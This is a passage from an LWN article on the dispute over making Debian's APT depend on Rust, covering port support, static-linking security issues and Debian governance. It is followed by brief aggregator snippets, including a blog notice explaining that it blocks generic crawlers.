Antoni Boucher that “”, but phrasing it that way “gets more attention in the
news”. Boucher is the maintainer of , a GCC
ahead-of-time code generator for Rust. Nothing, Glaubitz said, stops ports from using a non-Rust version of APT until Boucher and others manage to bootstrap Rust for those ports.
David Kalnischkies, who is also a major
contributor to APT, suggested
that if the goal is to reduce bugs, it would be better to remove the code that is used to parse the .deb, .ar, and .tar formats that Klode mentioned from APT entirely. It is only needed for two tools,
and , he said, and the only “” of
was by Klode’s employer, Canonical, for its Launchpad software-collaboration platform. If those were taken out of the main APT code base, then it would not matter whether they were written in Rust, Python, or another language, since the tools are not directly necessary for any given port.
Kalnischkies also questioned the claim that Rust was necessary to achieve the stronger approach to unit testing that Klode mentioned:
You can certainly do unit tests in C++, we do. The main problem is that someone has to write those tests. Like docs.
Your new solver e.g. has none (apart from our preexisting integration tests). You don’t seriously claim that is because of C++ ? If you don’t like GoogleTest, which is what we currently have, I could suggest doctest (as I did in previous installments). Plenty other frameworks exist with similar or different styles.
Klode has not responded to those comments yet, which is a bit unfortunate given the fact that introducing hard dependencies on Rust has an impact beyond his own work on APT. It may well be that he has good answers to the questions, but it can also give the impression that Klode is simply embracing a trend toward Rust. He is involved
in the Ubuntu work to migrate from GNU Coreutils to the Rust-based uutils. The reasons given for that work, again, are around modernization and better security—but security is not automatically guaranteed simply by switching to Rust, and there are a number of other considerations.
For example, Adrian Bunk pointed
out that there are a number of Debian teams, as well as tooling, that will be impacted by writing some of APT in Rust. The release notes for Debian 13 (“trixie”) mention
that Debian’s infrastructure “currently has problems with
rebuilding packages of types that systematically use static
linking”, such as those with code written in Go and Rust. Thus, “these packages will be
covered by limited security support until the infrastructure is
improved to deal with them maintainably”. Limited security support means that updates to Rust libraries are likely to only be released when Debian publishes a point release, which happens about every two months. The security team has specifically
stated that is fully supported, but there are still outstanding problems.
Due to the static-linking issue, any time one of ’s dependencies, currently more than 40 Rust crates, have to be rebuilt due to a security issue, (at least potentially) also needs to be rebuilt. There are also difficulties in tracking CVEs for all of its dependencies, and understanding when a security vulnerability in a Rust crate may require updating a Rust program that depends on it.
Fabian Grünbichler, a maintainer of Debian’s Rust toolchain, listed
several outstanding problems Debian has with dealing with Rust packages. One of the largest is the need for a consistent Debian policy for declaring statically linked libraries. In 2022, Guillem Jover added a control field for Debian packages called Static-Built-Using (SBU), which would list the source packages used to build a binary package. This would indicate when a binary package needs to be rebuilt due to an update in another source package. For example, depends on more than 40 Rust crates that are packaged for Debian. Without declaring the SBUs, it may not be clear if needs to be updated when one of its dependencies is updated. Debian has been working on a policy
requirement for SBU since April 2024, but it is not yet finished or adopted.
The discussion sparked by Grünbichler makes clear that most of Debian’s Rust-related problems are in the process of being solved. However, there’s no evidence that Klode explored the problems before declaring that APT would depend on Rust, or even asked “is this a reasonable time frame to introduce this dependency?”
Debian’s tagline, or at least one of its taglines, is “the universal operating system”, meaning that the project aims to run on a wide variety of hardware (old and new) and be usable on the desktop, server, IoT devices, and more. The “Why Debian” page lists a number of reasons users and developers should choose the distribution: multiple hardware
architectures, long-term
support, and its democratic governance
structure are just a few of the arguments it puts forward in favor of Debian. It also notes that “Debian cannot be controlled by a
single company”. A single developer employed by a company to work on Debian tools pushing a change that seems beneficial to that company, without discussion or debate, that impacts multiple hardware architectures and that requires other volunteers to do unplanned work or meet an artificial deadline seems to go against many of the project’s stated values.
Debian, of course, does have checks and balances that could be employed if other Debian developers feel it necessary. Someone could, for example, appeal to Debian’s Technical Committee, or sponsor a general resolution to override a developer if they cannot be persuaded by discussion alone. That happened recently when the committee required systemd
maintainers to provide the directory “until
a satisfactory migration of impacted software has occurred and Policy
updated accordingly”.
However, it also seems fair to point out that Debian can move slowly, even glacially, at times. APT added
support for the DEB822
format for its source information lists in 2015. Despite APT supporting that format for years, Klode faced resistance in 2021, when he pushed
for Debian to move to the new format ahead of the Debian 12 (“bookworm”) release in 2021, but was unsuccessful. It is now the default for trixie with the move to APT 3.0, though APT will continue to support the old format for years to come.
The fact is, regardless of what Klode does with APT, more and more free software is being written (or rewritten) in Rust. Making it easier to support that software when it is packaged for Debian is to everyone’s benefit. Perhaps the project needs some developers who will be aggressive about pushing the project to move more quickly in improving its support for Rust. However, what is really needed is more developers lending a hand to do the work that is needed to support Rust in Debian and elsewhere, such as . It does not seem in keeping with Debian’s community focus for a single developer to simply declare dependencies that other volunteers will have to scramble to support.
...
Read the original on lwn.net »
Upload an image to start an anonymous OCR battleNeed a document? Upload an image to start an anonymous OCR battleNeed a document?
...
Read the original on www.ocrarena.ai »
You’re probably reading this page because you’ve attempted to access some part of my blog (Wandering
Thoughts) or CSpace, the wiki thing it’s part of. Unfortunately whatever you’re using to do so has a HTTP User-Agent header value that is too generic or otherwise excessively suspicious. Unfortunately, as of early 2025 there’s a plague of high volume crawlers (apparently in part to gather data for LLM training) that behave like this. To reduce the load on Wandering Thoughts I’m experimenting with (attempting to) block all of them, and you’ve run into this.
All HTTP User-Agent headers should clearly identify what they are, and for non-browser user agents, they should identify not just the software involved but also who specifically is using that software. An extremely generic value such as “Go-http-client/1.1” is not something that I consider acceptable any more.
...
Read the original on utcc.utoronto.ca »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.